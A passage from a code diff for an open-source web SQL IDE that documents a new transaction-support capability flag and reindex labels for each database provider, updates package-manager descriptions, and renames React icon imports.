 | `supportsInlineRowEdit` | `false` — a bare `UPDATE ... SET` is code `48` `NOT_IMPLEMENTED` here ([§13](#13-known-limitations--future-work)) |
+| `supportsTransactions` | `false` — reached over stateless HTTP, and ClickHouse has no general transaction to wrap anyway, so the trio and SANDBOX are not offered (#U13) |
 | `declaresForeignKeys` | `false` — `REFERENCES` parses in a column definition and enforces nothing, and `system.*` holds no constraint catalog to read one back from |
 | `supportsMaintenance` | `true` |
 | `maintenanceOperations` | `['optimize', 'analyze', 'kill']` |

--- a/docs/providers/couchbase.md
+++ b/docs/providers/couchbase.md
@@ -618,6 +618,7 @@ operations.
 | `supportsExternalQueryLimiting` | `true` |
 | `supportsCreateTable` | `false` |
 | `supportsInlineRowEdit` | `false` — SQL++ has `UPDATE <keyspace> SET ... WHERE ...`, but the shared editor's `WHERE <pk> = <value>` would filter on `__id`, the key **projection alias**, which is not a document field ([§13](#13-known-limitations--future-work)) |
+| `supportsTransactions` | `false` — the query service is reached over stateless HTTP and no session spans two requests, so the transaction trio and SANDBOX are not offered (#U13) |
 | `declaresForeignKeys` | `false` — SQL++ has no referential constraint; collections are schemaless and the columns reported here are inferred from a document sample |
 | `supportsMaintenance` | `true` |
 | `maintenanceOperations` | `['analyze', 'reindex', 'kill']` |
@@ -641,6 +642,22 @@ system:completed_requests, which keeps only requests over the query service's th
 Queries panel's empty state was hardcoded to PostgreSQL's `pg_stat_statements` advice on every engine
 (`docs/BACKLOG.md` U12), and the completed-requests catalog ([§7](#7-monitoring--health)) is what
 this cluster actually keeps.
+
+The global Reindex card gets its own triad (`docs/BACKLOG.md` U6). It was hardcoded to PostgreSQL's
+*"Run Reindex"* / *"Rebuild Indexes"* / *"Reconstructs all indexes in the database."*, and this
+provider's `reindex` is none of those things: it is `BUILD INDEX` over the **deferred** GSI indexes of
+one keyspace ([§8](#8-maintenance)).
+
+| Field | Value |
+| --- | --- |
+| `reindexGlobalLabel` | *Build Indexes* |
+| `reindexGlobalTitle` | *Build Deferred GSI Indexes* |
+| `reindexGlobalDesc` | *Runs BUILD INDEX for the deferred global secondary indexes of one collection; it needs a collection, so run it from the collection rather than here.* |
+
+The last clause is a fact about the control, not a hedge: `dispatchMaintenance()` sends `reindex`
+through `requireTarget()`, while the Operations tab's global card sends no target, so the global card
+answers *"The reindex operation requires a target"* on Couchbase. The card's targeting is
+`docs/BACKLOG.md` U9's business; the wording at least says where the operation does work.
 
 ---
 

--- a/docs/providers/druid.md
+++ b/docs/providers/druid.md
@@ -1234,6 +1234,7 @@ Both halves of that are real constraints, not scope cuts made lightly:
 | `supportsExternalQueryLimiting` | `true` | `LIMIT n` / `LIMIT n OFFSET m` are both correct Druid SQL |
 | `supportsCreateTable` | **`false`** | `CREATE` is not in the grammar; a datasource is created by ingestion ([§3.11](#311-the-three-false-capabilities-are-each-impossible-not-merely-unimplemented)) |
 | `supportsInlineRowEdit` | **`false`** | `UPDATE t SET ...` answers `Unsupported SQL statement [UPDATE]`; Druid SQL has no row-level DML ([§5.5](#55-druid-sql-cannot-write-and-the-server-says-so-clearly)) |
+| `supportsTransactions` | **`false`** | Druid SQL has no DML at all, so there is nothing for a transaction to hold; the trio and SANDBOX are withheld instead of answering HTTP 400 (#U13) |
 | `declaresForeignKeys` | **`false`** | Druid has no constraints — no primary key either — and a datasource cannot reference another, so an empty relations list is the engine and not the schema |
 | `supportsMaintenance` | **`false`** | Nothing in `MaintenanceType` is reachable from Druid SQL ([§8](#8-maintenance)) |
 | `maintenanceOperations` | `[]` | Consequence of the above |

--- a/docs/providers/elasticsearch.md
+++ b/docs/providers/elasticsearch.md
@@ -925,6 +925,7 @@ difference — `OFFSET` — has no field in `ProviderCapabilities` to declare it
 | `supportsExternalQueryLimiting` | `true` | `LIMIT n` is correct here; the one form that is not is refused by `prepareQuery()` ([§5.5](#55-the-preparequery-override-there-is-no-second-page)) |
 | `supportsCreateTable` | **`false`** | Not in the grammar ([§5.6](#56-this-grammar-does-not-write)) |
 | `supportsInlineRowEdit` | **`false`** | `UPDATE` is not in the grammar, so the editor's statement could only ever produce an error (#269) |
+| `supportsTransactions` | **`false`** | `BEGIN` is not in the grammar and the surface is stateless HTTP; the trio and SANDBOX are withheld instead of answering HTTP 400 (#U13) |
 | `declaresForeignKeys` | **`false`** | The engine has no such constraint in its model, so the empty `foreignKeys` means "impossible here" rather than "none declared, or none visible to this role" — the distinction #414 was about |
 | `supportsMaintenance` | **`false`** | Nothing in `MaintenanceType` is SQL-reachable ([§8](#8-maintenance)) |
 | `maintenanceOperations` | `[]` | Consequence of the above |

--- a/docs/providers/libredb.md
+++ b/docs/providers/libredb.md
@@ -522,6 +522,7 @@ for a different reason — the rows are derived groupings, see 5.3.
 | `supportsExternalQueryLimiting` | `false` |
 | `supportsCreateTable` | `false` |
 | `supportsInlineRowEdit` | `false` — the command grammar (`get`/`put`/`delete`/`prefix`/`range`) has no `UPDATE ... SET` for the results grid's inline editor to emit |
+| `supportsTransactions` | `false` — the command grammar has no transaction verb at all, so the trio and SANDBOX are not offered (#U13) |
 | `declaresForeignKeys` | `false` — the catalog declares namespaces and columns and nothing that references another namespace, so there is no foreign key to read |
 | `tablesAreDerivedGroupings` | `true` — the namespaces come from a bounded `kv.range` over 10000 keys, grouped by prefix, so they are this server's summary of what one scan reached rather than objects the engine declares. The agent layer states this to a plan run in one sentence |
 | `supportsMaintenance` | `false` |

--- a/docs/providers/mongodb.md
+++ b/docs/providers/mongodb.md
@@ -275,6 +275,7 @@ three, though `runMaintenance` also accepts `optimize`/`kill`/`reindex` when inv
 | `supportsExternalQueryLimiting` | `false` |
 | `supportsCreateTable` | `false` |
 | `supportsInlineRowEdit` | `false` — the query language is JSON commands, so there is no `UPDATE ... SET` for the results grid's inline editor to emit |
+| `supportsTransactions` | `false` — multi-document transactions need a client session this provider does not hold, so BEGIN/COMMIT/ROLLBACK and SANDBOX are not offered; they used to be, and answered HTTP 400 (#U13) |
 | `declaresForeignKeys` | `false` — MongoDB has no foreign key constraint at all, so an empty `foreignKeys` list here is the engine's model and not this database's shape |
 | `supportsMaintenance` | `true` |
 | `maintenanceOperations` | `['vacuum', 'analyze', 'check']` |

--- a/docs/providers/mssql.md
+++ b/docs/providers/mssql.md
@@ -425,6 +425,7 @@ validates the target parses as an integer SPID.
 | `supportsExternalQueryLimiting` | `true` (from base) |
 | `supportsCreateTable` | `true` (from base) |
 | `supportsInlineRowEdit` | `true` — `UPDATE t SET c = v WHERE pk = v` is core T-SQL DML |
+| `supportsTransactions` | `true` — the `mssql` package's `Transaction` over one held pool connection, so the trio and the SANDBOX toggle are offered (#U13) |
 | `declaresForeignKeys` | `true` — inherited from the base capabilities; read from `sys.foreign_keys`, so an empty list is about the schema or the role, not the engine |
 | `supportsMaintenance` | `true` |
 | `maintenanceOperations` | `['analyze', 'check', 'optimize', 'kill']` |

--- a/docs/providers/mysql.md
+++ b/docs/providers/mysql.md
@@ -355,6 +355,7 @@ validates that the target parses as an integer connection id.
 | `supportsExternalQueryLimiting` | `true` (from base) |
 | `supportsCreateTable` | `true` (from base) |
 | `supportsInlineRowEdit` | `true` — `UPDATE t SET c = v WHERE pk = v` is core MySQL DML |
+| `supportsTransactions` | `true` — the transaction runs on one held connection through the driver's own `beginTransaction()`, so the trio and the SANDBOX toggle are offered (#U13) |
 | `declaresForeignKeys` | `true` — inherited from the base capabilities; InnoDB declares them, so an empty list means this schema (or this role) has none, not the engine |
 | `supportsMaintenance` | `true` |
 | `maintenanceOperations` | `['analyze', 'optimize', 'check', 'kill']` |

--- a/docs/providers/opensearch.md
+++ b/docs/providers/opensearch.md
@@ -930,6 +930,7 @@ difference — `OFFSET` — has no field in `ProviderCapabilities` to declare it
 | `supportsExternalQueryLimiting` | `true` | **Both** limiter forms are correct here, `LIMIT n` and `LIMIT n OFFSET m` |
 | `supportsCreateTable` | **`false`** | Not in the grammar ([§5.6](#56-this-grammar-has-delete-and-it-is-off)) |
 | `supportsInlineRowEdit` | **`false`** | `UPDATE` is not in the grammar, so the editor's statement could only ever produce an error (#269) |
+| `supportsTransactions` | **`false`** | `BEGIN` is not in the grammar and the surface is stateless HTTP. Measured 2026-08-19 on OpenSearch 3.8.0: `POST /api/db/transaction` answered HTTP 400, *"Transaction control is not supported for this database type"*, for both `begin` and `rollback` — the measurement #U13 came from |
 | `declaresForeignKeys` | **`false`** | The engine has no such constraint in its model, so the empty `foreignKeys` means "impossible here" rather than "none declared, or none visible to this role" — the distinction #414 was about |
 | `supportsMaintenance` | **`false`** | Nothing in `MaintenanceType` is SQL-reachable ([§8](#8-maintenance)) |
 | `maintenanceOperations` | `[]` | Consequence of the above |

--- a/docs/providers/oracle.md
+++ b/docs/providers/oracle.md
@@ -414,6 +414,7 @@ inside `DBMS_STATS` arguments / `ALTER` identifiers that can't take bind paramet
 | `supportsExternalQueryLimiting` | `true` (from base) |
 | `supportsCreateTable` | `true` (from base) |
 | `supportsInlineRowEdit` | `true` — `UPDATE t SET c = v WHERE pk = v` is core Oracle DML |
+| `supportsTransactions` | `true` — Oracle is always in a transaction and the held connection commits or rolls back, so the trio and the SANDBOX toggle are offered (#U13) |
 | `declaresForeignKeys` | `true` — inherited from the base capabilities; read from `ALL_CONSTRAINTS`, so an empty list is about the schema or the owner, not the engine |
 | `supportsMaintenance` | `true` |
 | `maintenanceOperations` | `['analyze', 'optimize', 'kill']` |

--- a/docs/providers/postgres.md
+++ b/docs/providers/postgres.md
@@ -435,6 +435,12 @@ the client is not returned to the pool until commit/rollback. Surfaced via `POST
 The auto-rollback timer is the key safety mechanism: a client that opens a transaction and
 disconnects without committing would otherwise hold locks indefinitely.
 
+`supportsTransactions: true` ([§10](#10-capabilities--labels)) is what tells the editor toolbar to
+offer BEGIN/COMMIT/ROLLBACK and the auto-rolled-back SANDBOX toggle at all. It is declared rather
+than inferred because the route's own gate is `isTransactionProvider(provider)`, a runtime shape
+check no client can read, so before `docs/BACKLOG.md` U13 those controls rendered on every
+connection — including the ten providers that answer HTTP 400.
+
 ---
 
 ## 9. Maintenance
@@ -468,6 +474,7 @@ Overrides the SQL base defaults:
 | `supportsExternalQueryLimiting` | `true` |
 | `supportsCreateTable` | `true` |
 | `supportsInlineRowEdit` | `true` — `UPDATE t SET c = v WHERE pk = v` is core PostgreSQL DML |
+| `supportsTransactions` | `true` — `beginTransaction()` holds one pool client and runs `BEGIN` / `COMMIT` / `ROLLBACK` on it, so the editor's transaction trio and the auto-rolled-back SANDBOX toggle are offered here (#U13) |
 | `declaresForeignKeys` | `true` — inherited from the base capabilities; an empty `foreignKeys` list is then a fact about the schema or the reading role, never about the engine |
 | `supportsMaintenance` | `true` |
 | `maintenanceOperations` | `['vacuum', 'analyze', 'reindex', 'kill']` |
@@ -477,9 +484,22 @@ Overrides the SQL base defaults:
 
 ### Labels
 
-PostgreSQL uses the default SQL `getLabels()` from `BaseDatabaseProvider` (entity → *Table*,
-row → *row*, *Select Top 50*, *Vacuum Table*, *Analyze Table*, etc.) — no override needed, since
-the generic SQL wording already fits.
+PostgreSQL keeps the default SQL vocabulary from `BaseDatabaseProvider` (entity → *Table*,
+row → *row*, *Select Top 50*, *Vacuum Table*, *Analyze Table*, etc.) — the generic SQL wording
+already fits.
+
+`getLabels()` is overridden for **one** triad only: the Operations tab's global Reindex card, which
+was hardcoded to *"Run Reindex"* / *"Rebuild Indexes"* / *"Reconstructs all indexes in the database."*
+for every engine (`docs/BACKLOG.md` U6). That wording was written for this engine — the global card
+sends no target, so `runMaintenance('reindex')` here runs `REINDEX DATABASE`
+([§9](#9-maintenance)) — so declaring it changes nothing on PostgreSQL and lets the two
+other providers that offer `reindex` (SQLite, Couchbase) say what theirs does instead:
+
+| Field | Value |
+| --- | --- |
+| `reindexGlobalLabel` | *Run Reindex* |
+| `reindexGlobalTitle` | *Rebuild Indexes* |
+| `reindexGlobalDesc` | *Runs REINDEX DATABASE, reconstructing every index in the database.* |
 
 ---
 

--- a/docs/providers/redis.md
+++ b/docs/providers/redis.md
@@ -491,6 +491,7 @@ by no component (#427).
 | `supportsExternalQueryLimiting` | `false` |
 | `supportsCreateTable` | `false` |
 | `supportsInlineRowEdit` | `false` — Redis commands are not SQL, so there is no `UPDATE ... SET` for the results grid's inline editor to emit |
+| `supportsTransactions` | `false` — `MULTI`/`EXEC` exists in Redis and is not exposed through this provider, so the transaction trio and SANDBOX are not offered (#U13) |
 | `declaresForeignKeys` | `false` — Redis has no constraints at all, and the "tables" here are key prefixes this provider grouped rather than objects anyone declared |
 | `tablesAreDerivedGroupings` | `true` — `getSchema()` SCANs a bounded slice of the keyspace and groups the real key names it found by their prefix, so a `user:*` row is this server's own summary and not a key any command can be given. The agent layer states this to a plan run, in one sentence, so a grounded run does not draft a command against a grouping |
 | `supportsMaintenance` | `true` |

--- a/docs/providers/sqlite.md
+++ b/docs/providers/sqlite.md
@@ -114,9 +114,9 @@ DatabaseProvider (interface) → BaseDatabaseProvider → SQLBaseProvider → SQ
 `SQLiteProvider` inherits the shared SQL helpers (see
 [PostgreSQL doc §2.2](./postgres.md#22-what-sqlbaseprovider-provides)). It does **not** override
 `prepareQuery()`: SQLite uses standard `LIMIT`, so the base's `LIMIT` injection works. `getLabels()`
-is overridden for **one** field only — the slow-query empty state ([§9](#9-capabilities--labels)) —
-because the rest of the default SQL wording fits (*Vacuum Table* / *Analyze Table*, since SQLite has
-real `VACUUM`/`ANALYZE`).
+is overridden for **two** things only — the slow-query empty state and the global reindex wording
+([§9](#9-capabilities--labels)) — because the rest of the default SQL wording fits (*Vacuum Table* /
+*Analyze Table*, since SQLite has real `VACUUM`/`ANALYZE`).
 
 ### Dynamic driver load
 
@@ -185,6 +185,12 @@ took the **write** branch and returned an empty result with `changes: 0` for a q
 Unlike every networked SQL provider, SQLite exposes **no** `beginTransaction`/`commit`/`rollback`/
 `queryInTransaction`, **no** `cancelQuery`, and **no** pool/`getPoolStats`. It is a single embedded
 handle. (`POST /api/db/transaction` and `/api/db/cancel` are therefore not applicable to SQLite.)
+
+Since `docs/BACKLOG.md` U13 the client can see that: `supportsTransactions: false`
+([§9](#9-capabilities--labels)) is what withholds BEGIN/COMMIT/ROLLBACK and the auto-rolled-back
+SANDBOX toggle from the editor toolbar here. Before that flag existed the only gate was
+`isTransactionProvider(provider)` inside the route — a runtime shape check the browser cannot read —
+so the controls rendered on every connection and the route answered HTTP 400.
 
 ---
 
@@ -366,6 +372,7 @@ and `reindex` targets are quoted via `escapeIdentifier()`:
 | `supportsExternalQueryLimiting` | `true` (from base) |
 | `supportsCreateTable` | `true` (from base) |
 | `supportsInlineRowEdit` | `true` — `UPDATE t SET c = v WHERE pk = v` is core SQLite DML |
+| `supportsTransactions` | **`false`** — SQLite HAS `BEGIN`, but this provider holds no session across two requests, so `POST /api/db/transaction` refuses the call. The flag describes the provider's surface, not the engine, and the trio and SANDBOX toggle are withheld rather than offered and then failed (#U13) |
 | `declaresForeignKeys` | `true` — inherited from the base capabilities; `PRAGMA foreign_key_list` reads them whether or not enforcement is on |
 | `supportsMaintenance` | `true` |
 | `maintenanceOperations` | `['vacuum', 'analyze', 'reindex', 'check']` |
@@ -382,6 +389,17 @@ One field is overridden: `slowQueriesEmptyState` → *"SQLite keeps no statistic
 statements, so there is nothing to enable."* `getSlowQueries()` answers `[]` unconditionally
 ([§7](#7-monitoring--health)), so the monitoring Queries panel is always empty here, and its sentence
 was hardcoded to PostgreSQL's `pg_stat_statements` advice (`docs/BACKLOG.md` U12).
+
+Two overrides in total. The second is the Operations tab's global Reindex card, hardcoded to
+PostgreSQL's *"Reconstructs all indexes in the database."* until `docs/BACKLOG.md` U6. The global card
+sends no target, so `runMaintenance('reindex')` here runs a bare `REINDEX`
+([§8](#8-maintenance)), which rebuilds every index in the database **file**:
+
+| Field | Value |
+| --- | --- |
+| `reindexGlobalLabel` | *Run Reindex* |
+| `reindexGlobalTitle` | *Rebuild Indexes* |
+| `reindexGlobalDesc` | *Runs bare REINDEX, rebuilding every index in the database file.* |
 
 ---
 

--- a/docs/providers/trino.md
+++ b/docs/providers/trino.md
@@ -672,6 +672,7 @@ it. A button that always fails is worse than a stated reason.
 | `supportsExternalQueryLimiting` | `true` | `LIMIT` is injected by the shared limiter, transposed ([§3.5](#35-offset-comes-before-limit)) |
 | `supportsCreateTable` | `true` | In the grammar, live-verified on `memory` ([§5.5](#55-writes-belong-to-the-connector-not-to-the-engine)) |
 | `supportsInlineRowEdit` | `false` | No primary key exists to build a one-row `WHERE` ([§3.8](#38-no-keys-no-indexes--and-why-that-is-a-fact-about-the-engine)) |
+| `supportsTransactions` | `false` | Trino has `START TRANSACTION`, but a transaction lives in an HTTP session header this provider does not carry between statements, so the trio and SANDBOX are not offered (#U13) |
 | `declaresForeignKeys` | `false` | Not in the model at all ([§3.8](#38-no-keys-no-indexes--and-why-that-is-a-fact-about-the-engine)) |
 | `supportsMaintenance` | `true` | |
 | `maintenanceOperations` | `["kill"]` | The only operation the engine itself can promise ([§8](#8-maintenance)) |

--- a/packaging/chocolatey/libredb-studio.nuspec.tmpl
+++ b/packaging/chocolatey/libredb-studio.nuspec.tmpl
@@ -28,9 +28,13 @@
     <docsUrl>https://github.com/libredb/libredb-studio/blob/main/docs/DISTRIBUTION.md</docsUrl>
     <bugTrackerUrl>https://github.com/libredb/libredb-studio/issues</bugTrackerUrl>
     <tags>libredb-studio database sql ide editor postgres postgresql mysql sqlite oracle mssql mongodb redis</tags>
-    <summary>Web-based SQL IDE for thirteen engines, including PostgreSQL, MySQL, SQL Server, Oracle, MongoDB, Redis, ClickHouse and Elasticsearch.</summary>
+    <!-- No engine count in the summary or the description: nothing
+         regenerates this template from the provider registry, so a number
+         here is stale the day the next engine lands (issue #445). Name the
+         engines instead - the description below is the exhaustive list. -->
+    <summary>Web-based SQL IDE for PostgreSQL, MySQL, SQL Server, Oracle, MongoDB, Redis, ClickHouse, Cassandra, Elasticsearch and more, with AI query assistance.</summary>
     <description><![CDATA[
-LibreDB Studio is an open-source, web-based SQL IDE for cloud-native teams. It connects to PostgreSQL, MySQL, SQLite, Oracle, SQL Server, MongoDB, Redis, Couchbase, ClickHouse, Apache Druid, Elasticsearch, OpenSearch and Apache Trino, and ships a Monaco-powered editor with AI query assistance, schema browsing, ER diagrams, charts, and import/export tooling.
+LibreDB Studio is an open-source, web-based SQL IDE for cloud-native teams. It connects to PostgreSQL, MySQL, SQLite, Oracle, SQL Server, MongoDB, Redis, Couchbase, ClickHouse, Apache Druid, Elasticsearch, OpenSearch, Apache Trino and Apache Cassandra, and ships a Monaco-powered editor with AI query assistance, schema browsing, ER diagrams, charts, and import/export tooling.
 
 This package installs the standalone server together with a bundled, private Node.js runtime - nothing else to install.
 

--- a/packaging/homebrew/libredb-studio.rb.tmpl
+++ b/packaging/homebrew/libredb-studio.rb.tmpl
@@ -9,7 +9,11 @@
 # the tap by hand - change this template and re-release.
 # ==============================================================================
 class LibredbStudio < Formula
-  desc "Web-based SQL IDE for thirteen engines, from Postgres to Elasticsearch"
+  # No engine count in the desc: nothing regenerates this template from the
+  # provider registry, so a number here is stale the day the next engine
+  # lands (issue #445). Name the span instead. `brew audit` caps desc at 80
+  # characters, forbids a leading article and forbids the formula name.
+  desc "Web-based SQL IDE for SQL, NoSQL, analytics and search engines"
   homepage "https://github.com/libredb/libredb-studio"
   version "{{VERSION}}"
   license "MIT"

--- a/packaging/winget/LibreDB.Studio.locale.en-US.yaml.tmpl
+++ b/packaging/winget/LibreDB.Studio.locale.en-US.yaml.tmpl
@@ -13,12 +13,16 @@ PackageUrl: https://github.com/libredb/libredb-studio
 License: MIT
 LicenseUrl: https://github.com/libredb/libredb-studio/blob/main/LICENSE
 Copyright: Copyright (c) 2025 LibreDB
-ShortDescription: Web-based SQL IDE for thirteen engines, including PostgreSQL, MySQL, SQL Server, Oracle, MongoDB, Redis, ClickHouse and Elasticsearch, with AI query assistance.
+# No engine count in ShortDescription or Description: nothing regenerates this
+# template from the provider registry, so a number here is stale the day the
+# next engine lands (issue #445). Name the engines instead. Schema caps:
+# ShortDescription 256 characters, Description 10000.
+ShortDescription: Web-based SQL IDE for SQL, NoSQL, analytics and search engines - among them PostgreSQL, MySQL, SQL Server, Oracle, MongoDB, Redis, ClickHouse, Cassandra and Elasticsearch - with AI query assistance.
 Description: |-
   LibreDB Studio is an open-source, web-based SQL IDE for cloud-native teams.
-  It connects to thirteen engines - PostgreSQL, MySQL, SQLite, Oracle, SQL
-  Server, MongoDB, Redis, Couchbase, ClickHouse, Apache Druid, Elasticsearch,
-  OpenSearch and Apache Trino - and ships a Monaco-powered editor with AI query
+  It connects to PostgreSQL, MySQL, SQLite, Oracle, SQL Server, MongoDB, Redis,
+  Couchbase, ClickHouse, Apache Druid, Elasticsearch, OpenSearch, Apache Trino
+  and Apache Cassandra, and ships a Monaco-powered editor with AI query
   assistance, schema browsing, ER diagrams, charts, and import/export tooling.
   This package installs the standalone server with a bundled Node.js runtime;
   run `libredb-studio` and open http://127.0.0.1:3000 - the first run prints

--- a/src/components/CommandPalette.tsx
+++ b/src/components/CommandPalette.tsx
@@ -21,7 +21,7 @@ import {
   Layers,
   LogOut,
   Bot,
-  AlignLeft,
+  TextAlignStart,
   Save,
 } from "lucide-react";
 import { DatabaseConnection, TableSchema, SavedQuery, QueryHistoryItem } from "@/lib/types";
@@ -118,7 +118,7 @@ export function CommandPalette({
             <CommandShortcut>Ctrl+Enter</CommandShortcut>
           </CommandItem>
           <CommandItem onSelect={() => runAction(onFormatQuery)}>
-            <AlignLeft strokeWidth={1.5} className="w-3.5 h-3.5 text-fg-tertiary" />
+            <TextAlignStart strokeWidth={1.5} className="w-3.5 h-3.5 text-fg-tertiary" />
             <span>Format Query</span>
           </CommandItem>
           <CommandItem onSelect={() => runAction(onSaveQuery)}>

--- a/src/components/ConnectionModal.tsx
+++ b/src/components/ConnectionModal.tsx
@@ -19,8 +19,8 @@ import {
   Globe,
   Key,
   Link,
-  CheckCircle2,
-  XCircle,
+  CircleCheck,
+  CircleX,
   ClipboardPaste,
   Lock,
   ChevronDown,
@@ -841,9 +841,9 @@ export function ConnectionModal({
                   )}
                 >
                   {testResult.success ? (
-                    <CheckCircle2 strokeWidth={1.5} className="w-3.5 h-3.5 shrink-0" />
+                    <CircleCheck strokeWidth={1.5} className="w-3.5 h-3.5 shrink-0" />
                   ) : (
-                    <XCircle strokeWidth={1.5} className="w-3.5 h-3.5 shrink-0" />
+                    <CircleX strokeWidth={1.5} className="w-3.5 h-3.5 shrink-0" />
                   )}
                   <span className="leading-relaxed">{testResult.message}</span>
                 </div>

--- a/src/components/CreateTableModal.tsx
+++ b/src/components/CreateTableModal.tsx
@@ -7,7 +7,7 @@ import { Input } from "@/components/ui/input";
 import { Label } from "@/components/ui/label";
 import { Select, SelectContent, SelectItem, SelectTrigger, SelectValue } from "@/components/ui/select";
 import { Checkbox } from "@/components/ui/checkbox";
-import { Plus, Trash2, Table as TableIcon, Type, Settings2, Loader2 } from "lucide-react";
+import { Plus, Trash2, Table as TableIcon, Type, Settings2, LoaderCircle } from "lucide-react";
 import { toast } from "sonner";
 
 interface ColumnDefinition {
@@ -264,7 +264,7 @@ export function CreateTableModal({ isOpen, onClose, onTableCreated }: CreateTabl
             className="bg-blue-600 hover:bg-blue-500 text-white text-xs font-medium gap-2 px-6"
           >
             {isSubmitting ? (
-              <Loader2 strokeWidth={1.5} className="w-3 h-3 animate-spin" />
+              <LoaderCircle strokeWidth={1.5} className="w-3 h-3 animate-spin" />
             ) : (
               <Plus strokeWidth={1.5} className="w-3 h-3" />
             )}

--- a/src/components/DataCharts.tsx
+++ b/src/components/DataCharts.tsx
@@ -25,19 +25,19 @@ import { toast } from "sonner";
 import { type AgentChartSpec, QueryResult } from "@/lib/types";
 import { cn } from "@/lib/utils";
 import {
-  BarChart3,
-  LineChart as LineChartIcon,
-  PieChart as PieChartIcon,
-  AreaChart as AreaChartIcon,
+  ChartColumn,
+  ChartLine as LineChartIcon,
+  ChartPie as PieChartIcon,
+  ChartArea as AreaChartIcon,
   Download,
   Settings2,
   TrendingUp,
   Hash,
   Calendar,
   Type,
-  AlertCircle,
+  CircleAlert,
   Circle,
-  BarChart2,
+  ChartNoAxesColumn,
   Save,
   FolderOpen,
   X,
@@ -645,13 +645,13 @@ export function DataCharts({ result, spec = null }: DataChartsProps) {
   }
 
   const chartTypes: { type: ChartType; icon: React.ReactNode; label: string }[] = [
-    { type: "bar", icon: <BarChart3 strokeWidth={1.5} className="w-3.5 h-3.5" />, label: "Bar" },
+    { type: "bar", icon: <ChartColumn strokeWidth={1.5} className="w-3.5 h-3.5" />, label: "Bar" },
     { type: "line", icon: <LineChartIcon strokeWidth={1.5} className="w-3.5 h-3.5" />, label: "Line" },
     { type: "pie", icon: <PieChartIcon strokeWidth={1.5} className="w-3.5 h-3.5" />, label: "Pie" },
     { type: "area", icon: <AreaChartIcon strokeWidth={1.5} className="w-3.5 h-3.5" />, label: "Area" },
     { type: "scatter", icon: <Circle strokeWidth={1.5} className="w-3.5 h-3.5" />, label: "Scatter" },
-    { type: "histogram", icon: <BarChart2 strokeWidth={1.5} className="w-3.5 h-3.5" />, label: "Histogram" },
-    { type: "stacked-bar", icon: <BarChart3 strokeWidth={1.5} className="w-3.5 h-3.5" />, label: "Stacked" },
+    { type: "histogram", icon: <ChartNoAxesColumn strokeWidth={1.5} className="w-3.5 h-3.5" />, label: "Histogram" },
+    { type: "stacked-bar", icon: <ChartColumn strokeWidth={1.5} className="w-3.5 h-3.5" />, label: "Stacked" },
     { type: "stacked-area", icon: <AreaChartIcon strokeWidth={1.5} className="w-3.5 h-3.5" />, label: "Stack Area" },
   ];
 
@@ -664,7 +664,7 @@ export function DataCharts({ result, spec = null }: DataChartsProps) {
       case "categorical":
         return <Type strokeWidth={1.5} className="w-3 h-3" />;
       default:
-        return <AlertCircle strokeWidth={1.5} className="w-3 h-3" />;
+        return <CircleAlert strokeWidth={1.5} className="w-3 h-3" />;
     }
   };
 

--- a/src/components/DataImportModal.tsx
+++ b/src/components/DataImportModal.tsx
@@ -9,13 +9,13 @@ import { cn } from "@/lib/utils";
 import {
   Upload,
   FileSpreadsheet,
-  FileJson,
+  FileBraces,
   FileText,
   Check,
-  AlertTriangle,
+  TriangleAlert,
   Table2,
   ArrowRight,
-  Loader2,
+  LoaderCircle,
   X,
 } from "lucide-react";
 import type { DatabaseType, TableSchema } from "@/lib/types";
@@ -365,7 +365,7 @@ export function DataImportModal({ isOpen, onClose, onImport, tables, databaseTyp
                     <span className="text-xs">CSV</span>
                   </div>
                   <div className="flex items-center gap-1.5 text-fg-muted">
-                    <FileJson strokeWidth={1.5} className="w-3.5 h-3.5" />
+                    <FileBraces strokeWidth={1.5} className="w-3.5 h-3.5" />
                     <span className="text-xs">JSON</span>
                   </div>
                 </div>
@@ -382,7 +382,7 @@ export function DataImportModal({ isOpen, onClose, onImport, tables, databaseTyp
               />
               {error && (
                 <div className="mt-4 p-3 rounded-lg bg-red-500/10 border border-red-500/20 flex items-center gap-2">
-                  <AlertTriangle strokeWidth={1.5} className="w-3.5 h-3.5 text-red-400 shrink-0" />
+                  <TriangleAlert strokeWidth={1.5} className="w-3.5 h-3.5 text-red-400 shrink-0" />
                   <span className="text-xs text-red-400">{error}</span>
                 </div>
               )}
@@ -395,7 +395,7 @@ export function DataImportModal({ isOpen, onClose, onImport, tables, databaseTyp
               <div className="flex items-center justify-between">
                 <div className="flex items-center gap-3">
                   {fileType === "json" ? (
-                    <FileJson strokeWidth={1.5} className="w-5 h-5 text-amber-400" />
+                    <FileBraces strokeWidth={1.5} className="w-5 h-5 text-amber-400" />
                   ) : (
                     <FileText strokeWidth={1.5} className="w-5 h-5 text-emerald-400" />
                   )}
@@ -639,7 +639,7 @@ export function DataImportModal({ isOpen, onClose, onImport, tables, databaseTyp
                   >
                     {isImporting ? (
                       <>
-                        <Loader2 strokeWidth={1.5} className="w-3 h-3 animate-spin" /> Importing...
+                        <LoaderCircle strokeWidth={1.5} className="w-3 h-3 animate-spin" /> Importing...
                       </>
                     ) : (
                       <>

--- a/src/components/DataProfiler.tsx
+++ b/src/components/DataProfiler.tsx
@@ -1,7 +1,7 @@
 "use client";
 
 import { useState, useEffect, useMemo } from "react";
-import { Loader2, BarChart3, X, Hash, AlertCircle, Sparkles, Lock } from "lucide-react";
+import { LoaderCircle, ChartColumn, X, Hash, CircleAlert, Sparkles, Lock } from "lucide-react";
 import { cn } from "@/lib/utils";
 import { TableSchema, DatabaseConnection } from "@/lib/types";
 import { detectSensitiveColumns, maskValue } from "@/lib/data-masking";
@@ -208,7 +208,7 @@ export function DataProfiler({
         */}
         <div className="relative z-10 shrink-0 flex items-center justify-between gap-2 px-5 py-3 border-b border-hairline">
           <div className="flex min-w-0 items-center gap-2">
-            <BarChart3 strokeWidth={1.5} className="w-3.5 h-3.5 shrink-0 text-cyan-400" />
+            <ChartColumn strokeWidth={1.5} className="w-3.5 h-3.5 shrink-0 text-cyan-400" />
             <span className="text-xs font-medium text-fg shrink-0">Data Profiler</span>
             <span className="text-xs text-fg-muted font-mono truncate">{tableName}</span>
           </div>
@@ -225,14 +225,14 @@ export function DataProfiler({
         <div className="flex-1 overflow-auto p-5 space-y-4">
           {isLoading && (
             <div className="flex items-center justify-center gap-2 py-12 text-fg-muted">
-              <Loader2 strokeWidth={1.5} className="w-5 h-5 animate-spin" />
+              <LoaderCircle strokeWidth={1.5} className="w-5 h-5 animate-spin" />
               <span className="text-xs">Profiling {tableName}...</span>
             </div>
           )}
 
           {error && (
             <div className="bg-red-500/10 border border-red-500/20 rounded-lg p-3 text-xs text-red-400 flex items-center gap-2">
